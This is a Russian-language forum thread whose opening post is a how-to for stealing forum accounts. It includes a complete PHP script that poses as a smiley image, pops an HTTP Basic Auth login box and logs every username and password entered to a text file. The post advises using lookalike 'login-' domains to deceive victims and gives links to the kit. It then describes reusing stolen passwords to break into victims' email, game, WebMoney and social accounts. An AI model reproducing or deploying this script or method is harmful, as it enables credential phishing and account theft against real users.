Jump to content

Угон акка на форуме


SokQ

Recommended Posts

ДОБАВЛЮ : сайты можно и с юкоза, но я регал на www.holm.ru

 

Вот не помню где нашел, классная штука..

Вот описание :

Суть угона заключается в простом смайлике, который запрашивает авторизацию, вы регистрируетесь на форуме, ставите себе в подпись, или можете кому то в лс отправить его, или в сообщение добавить [ img ]ссылка на смайл[ /img ]

вот и все, как только человек увидит этот смайл, у него выскакивает такая табличка

http://i080.radikal.ru/0911/10/65895eb3f9d8.jpg

Сверху пишет сайт на котором у вас этот смайл,( потому и рекомендую делать его в типе : login или похожу что то на сайт того форума где разводите )

внизу то что вы уже сами можете написать ,мне нужно было для пульса, я написал pulseworld.ru , это вы можете редактировать в самом скрипте..

Ниже в теме все описано что для этого нужно редактировать

 

собственно это и есть окно авторизации, для того что бы такое прокатило, вам нужно зарегистрировать сайт, с ФТП , я зарегал на h16.ru , но можете и на Ucoz'е, лудше всего регать , как я увидел на своем опыте, сайт примерно такой : login-сайт вашего сервера или что то такое, например : login-zhyk.h16.ru , ну или что то в этом роде , круче придумаете , будет больше шанс развести кого то..

 

заливаете файлы с архива, на свой сайт, точней на ФТП, вам нужно залить все файлы, и .htaccess , не знаю как у вас но у меня через тотал и через файрзиллу не лило, пришлось качать ФТП Commander.

 

сама суть развода заключается вот в чем: вы кидаете смайл, который запрашивает авторизацию, т.к. это не смайл а PHP скрипт.. я сам в этом не очень конечно разбираюсь но стараюсь на нормальном языке рассказать.. как понял сам.

 

Это код скрипта, тут все описано, в зависимости где хотите разводить , надо менять скрипт , то есть эту строчку :

"Header('WWW-Authenticate: Basic realm="pulseworld.ru"');"

я например просто ради прикола хотел потестить работает ли оно на самом деле, оказалось работает..

на ФТП моего сайта мне в файле passwords.txt в него мне записывали пароли тех кто авторизовался в моем смайле... каждый акк и пасс в новом рядке.

 

код

<?

//делаем скрипт картинкой

header("Content-type: image/gif");

//делаем изображение смайликом из архива

$image = imagecreatefromgif('mellow.gif');

if(!$_COOKIE['LOGON'])

{

$login = $_SERVER['PHP_AUTH_USER'];

$pass  = $_SERVER['PHP_AUTH_PW'];

//Авторизация пройдёт, если пароль больше 4-ёх символов и вообще написан логин

if(strlen($pass) <= 4 || !$login)

{

  Header('HTTP/1.1 401 Unauthorized');

  Header('WWW-Authenticate: Basic realm="Авторизуйтесь Пожалуйста"');

}

elseif($login)

{

  //ставим кукис, чтобы при повторном заходе авторизации небыло, в самом начале проверка есть ли кукис ))

  setcookie('LOGON',md5($pass));

  //запишем пароли в файл

  $f = fopen('passwords.txt', 'ab'); //passwords.txt

  fwrite($f, $login." ||| ".$pass."\r\n"); //в формате LOGIN ||| PASSWORD

  fclose($f);

}

}

imagegif($image);

imagedestroy($image);

?>

Это конечно круто, но зачем нам какой то акк от форума, какое он даст нам преимущество.., а вот какое:

Вот мы уже знаем АКК и пасс ,человека которого развели, пусть для примера это будет .. Акк : qip пасс: piq

ну попадется на развод много народу , нам нужно выбрать того, у кого на ваш взгляд - может быть Какой то нормальный шмот, или пушка или еще какие то преимущества , что бы не делать всего этого зря.

На форуме заходим в вкладку изменить эмейл, там видим, пишет: Ваш текущий эмейл например будет : qip@mail.ru , в большинстве случаев пароль от форума соответствует паролю от эмейла в 80-90% случаях..

С эмейла нам тоже ничего не взять,"но" на эмейле может быть регистрации с других серверов, и в них пароли и аккаунты от сервера, например регистрируемся на ла2 ворлд, и тебе на эмейл приходит сообщение, "Поздравляем с успешной регистрацией, ваш аккаунт такой то , и пароль такой то"

Так можно найти много хорошего, даже те же пароли от Веб мани, или что то в этом роде.. и даже тот же контакт, в котором могут быть голоса,

 

Вот и сама ссылка на файл, в архиве есть видео мануал, и еще файл блокнота

_http://depositfiles.com/ru/files/s3nvp0ieh?redirect

в котором есть описание автора, этой проделки, но описание на этом форуме ,Описание делал сам,мой мануал с тем что в архиве не имеет ничего общего, (оттуда ничего не копировал), мануал писал я сам .

вот мой смайл, можете вводить авторизацию любые слова, и у вас покажет смайл, можете нажать отменить и все одно увидите, но при разводе народ вводит свой акк потому что думают - что это окно авторизации для форума

_http://login-vh.h16.ru/1/smile.gif

 

вот отчет с вирус тотала

 

Файл basic-auth_vs_forums.rar получен 2009.11.11 18:14:59 (UTC)

Антивирус  Версия  Обновление  Результат

a-squared  4.5.0.41  2009.11.11  -

AhnLab-V3  5.0.0.2  2009.11.11  -

Antiy-AVL  2.0.3.7  2009.11.11  -

Authentium  5.2.0.5  2009.11.11  -

Avast  4.8.1351.0  2009.11.11  -

AVG  8.5.0.423  2009.11.11  -

BitDefender  7.2  2009.11.11  -

CAT-QuickHeal  10.00  2009.11.11  -

ClamAV  0.94.1  2009.11.11  -

Comodo  2919  2009.11.11  -

DrWeb  5.0.0.12182  2009.11.11  -

eSafe  7.0.17.0  2009.11.11  -

eTrust-Vet  35.1.7115  2009.11.11  -

F-Prot  4.5.1.85  2009.11.11  -

F-Secure  9.0.15370.0  2009.11.09  -

Fortinet  3.120.0.0  2009.11.11  -

GData  19  2009.11.11  -

Ikarus  T3.1.1.74.0  2009.11.11  -

K7AntiVirus  7.10.893  2009.11.10  -

Kaspersky  7.0.0.125  2009.11.11  -

McAfee  5799  2009.11.11  -

McAfee+Artemis  5799  2009.11.11  -

McAfee-GW-Edition  6.8.5  2009.11.11  -

Microsoft  1.5202  2009.11.11  -

NOD32  4596  2009.11.11  -

Norman  6.03.02  2009.11.10  -

nProtect  2009.1.8.0  2009.11.11  -

Panda  10.0.2.2  2009.11.11  -

PCTools  7.0.3.5  2009.11.11  -

Rising  22.21.02.09  2009.11.11  -

Sophos  4.47.0  2009.11.11  -

Sunbelt  3.2.1858.2  2009.11.11  -

Symantec  1.4.4.12  2009.11.11  -

TheHacker  6.5.0.2.065  2009.11.11  -

TrendMicro  9.0.0.1003  2009.11.11  -

VBA32  3.12.10.11  2009.11.10  suspected of RAR.MailBomb

ViRobot  2009.11.11.2031  2009.11.11  -

VirusBuster  4.6.5.0  2009.11.10  -

Дополнительная информация

File size: 5646562 bytes

MD5...: 6dbbd5dc19eaeb1e5069adcca4ea69a6

SHA1..: 60440cbe0e4592c27fbc79053bed053aca404c0d

SHA256: 166162f12a7d09dda1935243b1936df6290c5c0af2abf6e55545e78ced7fe483

ssdeep: 98304:Bieh9wG2pr3/y35tgghFZAeyXjOul1FHKgDZ1DQQpFBxRS4QCp5SdSoWOf<br>SlYU/8:BiO923/a5zZvcHKkzDQQp28inrAv/YUq<br>

PEiD..: -

PEInfo: -

RDS...: NSRL Reference Data Set<br>-

pdfid.: -

 

 

 

 

 

 

 

 

 

 

 

 

Link to comment
Share on other sites

vot nedavno u menia kajdii raz kogda zaxadil na nekotorix saitax postoianno viskakivalo okno s etoi avtorizaciei, nekak ne mog poniat' 4to eto takoe i windous pereustanovil))))) dumal eto virus...

hmm poxodu tyt vse rabochee toka vot budet slojno razobratsia kak eto delat'. na pervii vzgliad dovolno vse zaputanno)

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...